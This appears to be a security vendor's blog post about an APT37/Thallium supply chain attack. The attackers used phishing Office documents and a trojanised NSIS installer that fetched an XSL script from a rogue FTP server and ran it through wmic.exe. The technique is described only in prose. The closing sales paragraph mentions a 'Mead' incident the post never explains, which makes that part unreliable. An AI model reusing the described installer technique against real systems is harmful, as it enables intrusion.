Thallium, a chemical element of atomic number 81 is a soft silvery-white metal and is very poisonous.

The North Korean threat actor group APT37 is also known as Thallium. This threat group performed a cyberattack on a private stock investment messenger service in a software supply chain attack.

Their tactics and techniques consisted of a series of phishing attacks by using Microsoft Office documents to lure their victims. Thallium also sent infected Windows installers and macro-laden Office documents.

They did this by producing a malicious coded-infused Windows executable using Nullsoft Scriptable Install System (NSIS). It not only contained malicious code, but also real files from the stock investment application program.

Within the real installer, threat actors implemented specific commands that made a malicious XSL script from a rogue FTP server and executed it on Windows systems through a built-in wmic.exe utility.

Another supply chain attack is a cause for concern, given what has happened recently in the SolarWinds breach. The trail of connections to the specific victims opens up many lanes for threat actors to infiltrate.

Read more technical details on Thallium here.

When organizations partner with a cybersecurity company like SpearTip, logs are monitored 24/7/365. Threats come in many forms, one being former employees, or insiders. SpearTip’s ShadowSpear® Platform has been proven to prevent the advanced malware too. Not only does ShadowSpear® prevent malicious encryption, but also would have detected and prevented the activity that allowed Mead full access to the environment. Our professional, certified cybersecurity engineers protect environments and deploy our proprietary tool, ShadowSpear® when an environment is under attack.